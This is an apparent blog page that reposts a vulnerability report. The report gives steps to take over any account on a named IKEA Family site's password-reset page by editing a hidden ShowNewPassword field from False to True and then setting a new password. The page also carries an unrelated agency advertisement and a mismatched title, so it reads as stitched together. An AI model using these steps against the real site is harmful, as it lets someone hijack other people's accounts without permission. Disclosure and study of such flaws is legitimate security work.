Hoki Injection CVE-2020-69

  • Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.

Summary:

Attacker can takeover ALL account on Family ikea, with reset pass.
Steps To Reproduce:

https://family.ikea.eg/en-us/login/forgotpassword

  • first enter your email
  • go to inspect element, and search this data:

<input data-val="true" data-val-required="The ShowNewPassword field is required." id="ShowNewPassword" name="ShowNewPassword" type="hidden" value="False">edited value=false to value=true like this:

<input data-val="true" data-val-required="The ShowNewPassword field is required." id="ShowNewPassword" name="ShowNewPassword" type="hidden" value="True">
  • click next
  • put your new password.
  • confirm and account takeover

Artikel Terbaru